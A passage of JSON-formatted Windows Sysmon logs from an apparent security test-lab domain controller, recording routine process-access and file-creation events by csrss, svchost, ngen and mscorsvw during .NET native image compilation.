l+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7368,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:52.355\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1324-5F25-0000-0010820D0B00}\r\nTargetProcessId: 4440\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:52.355","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1324-5F25-0000-0010820D0B00}","TargetProcessId":"4440","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7369,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:52.355\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1324-5F25-0000-0010820D0B00}\r\nTargetProcessId: 4440\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:52.355","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1324-5F25-0000-0010820D0B00}","TargetProcessId":"4440","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7370,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:00:52.449\r\nProcessGuid: {E2A3D6B1-1324-5F25-0000-0010820D0B00}\r\nProcessId: 4440\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1158-0\\Microsoft.GroupPolicy.Targeting.Interop.dll\r\nCreationUtcTime: 2020-08-01 07:00:52.449","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:00:52.449","ProcessGuid":"{E2A3D6B1-1324-5F25-0000-0010820D0B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1158-0\\Microsoft.GroupPolicy.Targeting.Interop.dll","CreationUtcTime":"2020-08-01 07:00:52.449","EventReceivedTime":"2020-08-01 07:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7371,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:52.465\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1324-5F25-0000-00101F110B00}\r\nTargetProcessId: 2980\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:52.465","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1324-5F25-0000-00101F110B00}","TargetProcessId":"2980","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7372,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:52.465\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1324-5F25-0000-00101F110B00}\r\nTargetProcessId: 2980\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:52.465","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1324-5F25-0000-00101F110B00}","TargetProcessId":"2980","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7373,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:52.465\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1324-5F25-0000-00101F110B00}\r\nTargetProcessId: 2980\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:52.465","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1324-5F25-0000-00101F110B00}","TargetProcessId":"2980","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7374,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:52.511\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1324-5F25-0000-0010CA140B00}\r\nTargetProcessId: 4840\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:52.511","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1324-5F25-0000-0010CA140B00}","TargetProcessId":"4840","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7375,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:52.511\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1324-5F25-0000-0010CA140B00}\r\nTargetProcessId: 4840\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:52.511","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1324-5F25-0000-0010CA140B00}","TargetProcessId":"4840","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7376,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:52.511\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1324-5F25-0000-0010CA140B00}\r\nTargetProcessId: 4840\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:52.511","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1324-5F25-0000-0010CA140B00}","TargetProcessId":"4840","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
